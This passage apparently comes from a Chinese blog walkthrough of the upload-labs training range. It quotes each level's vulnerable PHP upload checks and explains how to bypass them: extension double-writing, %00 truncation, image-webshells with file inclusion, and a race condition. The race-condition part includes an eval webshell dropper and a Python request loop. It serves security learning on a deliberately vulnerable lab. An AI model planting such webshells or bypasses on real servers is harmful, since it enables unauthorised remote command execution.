str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br><span class="line">用str_ireplace函数将符合黑名单中的后缀名进行替换为空</span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li>绕过方式:<strong>双写绕过</strong>;</li></ul><p>+++</p><h2 id="Pass-11"><a href="#Pass-11" class="headerlink" title="Pass-11"></a>Pass-11</h2><p>首先,尝试上传php文件,提示信息为:<strong>提示:只允许上传.jpg|.png|.gif类型文件!</strong> </p><p>查看提示:</p><blockquote><p>本pass上传路径可控!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单</strong>;</p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>,<span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"><span class="comment">// $img_path直接拼接</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li><p>绕过方式:<strong>利用%00截断绕过</strong>;</p><ul><li>需关闭magic_quotes_gpc</li><li>php 版本<5.3.4</li></ul></li></ul><p>+++</p><h2 id="Pass-12"><a href="#Pass-12" class="headerlink" title="Pass-12"></a>Pass-12</h2><p>首先,尝试上传php文件,提示信息为:<strong>提示:只允许上传.jpg|.png|.gif类型文件!</strong> </p><p>查看提示:</p><blockquote><p>本pass上传路径可控!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li>拦截方式:<strong>服务端白名单</strong>;</li></ul><ul><li><p>绕过方式:</p><p><strong>利用%00截断绕过</strong>;这一关和Pass-11的区别是,00截断是用在POST中,且是在二进制中进行修改。因为POST不会像GET那样对%00进行自动解码。/在BP中选中%00右键,可以直接编码;</p><ul><li>需关闭magic_quotes_gpc</li><li>php 版本<5.3.4</li></ul></li></ul><p>+++</p><h2 id="Pass-13"><a href="#Pass-13" class="headerlink" title="Pass-13"></a>Pass-13</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:文件未知,上传失败! *</em> </p><p>查看提示:</p><blockquote><p>本pass检查图标内容开头2个字节!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line"> $bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line"> fclose($file);</span><br><span class="line"> $strInfo = @unpack(<span class="string">"C2chars"</span>, $bin); </span><br><span class="line"> $typeCode = intval($strInfo[<span class="string">'chars1'</span>].$strInfo[<span class="string">'chars2'</span>]); </span><br><span class="line"> $fileType = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>($typeCode){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> $fileType = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> $fileType = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> $fileType = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> $fileType = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $fileType;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_type = getReailFileType($temp_file);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($file_type == <span class="string">'unknown'</span>){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_type;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单</strong>;<strong>getReailFileType函数只会读取文件的前两个字节</strong></p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line">$bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li><p>绕过方式:<strong>图片马+文件包含利用</strong>;</p><ul><li><p>制作图片马:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy <span class="number">1</span>.jpg/<span class="selector-tag">a</span> + <span class="number">1</span>.txt/<span class="selector-tag">b</span> <span class="number">2</span>.jpg</span><br><span class="line"><span class="comment">//1.txt中的内容为一句话木马,1.jpg则是一张图片。生成的图片马是2.jpg</span></span><br></pre></td></tr></table></figure></li><li><p>利用include.php实现文件包含</p></li><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line">$file = $_GET[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($file)){</span><br><span class="line"> <span class="keyword">include</span> $file;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li>蚁剑连接</li></ul><p>+++</p><h2 id="Pass-14"><a href="#Pass-14" class="headerlink" title="Pass-14"></a>Pass-14</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:文件未知,上传失败! *</em> </p><p>查看提示:</p><blockquote><p>本pass使用getimagesize()检查是否为图片文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $types = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(file_exists($filename)){</span><br><span class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(stripos($types,$ext)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> $ext;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单**</strong>;校验了文件头**</p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$info = getimagesize($filename);</span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li>绕过方式:<strong>图片马+文件包含利用</strong>;</li></ul><p>+++</p><h2 id="Pass-15"><a href="#Pass-15" class="headerlink" title="Pass-15"></a>Pass-15</h2><p>需要开启php_exif模块</p><p>绕过方式:<strong>图片马+文件包含利用</strong>;</p><p>+++</p><h2 id="Pass-16"><a href="#Pass-16" class="headerlink" title="Pass-16"></a>Pass-16</h2><p>这里使用容易绕过二次渲染的gif文件。现在制作一个gif图片马,copy就可以了。也可以winhex制作。</p><p>制作后便上传,发现无法利用。然后将上传的图片重新下载下来,放入winhex,进行对比。</p><p>可以找到二次渲染后不变的地方,而这个地方就是可以插入一句话的地方。</p><p>上传修改好的图片马,蚁剑连接成功。</p><p><strong>图片马二次渲染</strong></p><p>+++</p><h2 id="Pass-17"><a href="#Pass-17" class="headerlink" title="Pass-17"></a>Pass-17</h2><p>拦截方式:<strong>白名单验证,条件竞争</strong></p><p>这一关是先上传再判断,所以实在判断前就对上传的文件进行请求。</p><p>先创建一个webshell.php,内容为</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> fputs(fopen(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST["cmd"]) ?>'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>再使用python不断请求</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"> requests.get(<span class="string">"http://localhost/upload-labs/upload/webshell.php"</span>)</span><br></pre></td></tr></table></figure><p>运行python代码,再开始上传php文件。</p><p>看是否有shell.php;</p><p>蚁剑连接;</p><p>+++</p><h1 id="Upload-Labs-文件上传"><a href="#Upload-Labs-文件上传" class="headerlink" title="Upload Labs 文件上传"></a>Upload Labs 文件上传</h1><p><strong>项目地址</strong>:<a href="https://github.com/c0ny1/upload-labs" target="_blank" rel="noopener">https://github.com/c0ny1/upload-labs</a></p><h2 id="第1关-前端js绕过"><a href="#第1关-前端js绕过" class="headerlink" title="第1关 前端js绕过"></a>第1关 前端js绕过</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><script type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = <span class="built_in">document</span>.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name) == <span class="number">-1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><<span class="regexp">/script></span></span><br></pre></td></tr></table></figure><ul><li>前端禁用js</li><li>抓包绕过</li></ul><h2 id="第2关-content-type"><a href="#第2关-content-type" class="headerlink" title="第2关 content-type"></a>第2关 content-type</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> (($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span> . $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><h2 id="第3关-php3-phtml"><a href="#第3关-php3-phtml" class="headerlink" title="第3关 php3 phtml"></a>第3关 php3 phtml</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>黑名单判断,于是尝试用php3,phtml绕过</p><p>apache httpd.conf进行配置</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php <span class="selector-class">.php</span> <span class="selector-class">.php3</span> .phtml</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/qq_19916577/article/details/46502761" target="_blank" rel="noopener">MimeTypes表</a></p><p><a href="https://www.waitalone.cn/php-windows-upload.html" target="_blank" rel="noopener">当php邂逅windows通用上传缺陷</a></p><p>在文件上传时,我们往往会考虑到文件名截断,如%00 等..</p><p>可能还会用冒号(“:”)去截断</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3<span class="selector-class">.php</span><span class="selector-pseudo">:jpg</span></span><br></pre></td></tr></table></figure><p>冒号截断产生的文件是空白的,里面并不会有任何的内容</p><p>会写入一个<code>3.php</code>的空文件</p><p><code><</code> 就等于 <code>**</code>,而<code>*</code>代码任意字符,于是乎可以这样修改上传的文件名,如下:</p><p>然后修改名字为</p><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">3.</span><<<</span><br><span class="line"><span class="meta"><?</span>php phpinfo();<span class="meta">?></span></span><br></pre></td></tr></table></figure><h2 id="第4关-htaccess"><a href="#第4关-htaccess" class="headerlink" title="第4关 .htaccess"></a>第4关 .htaccess</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span 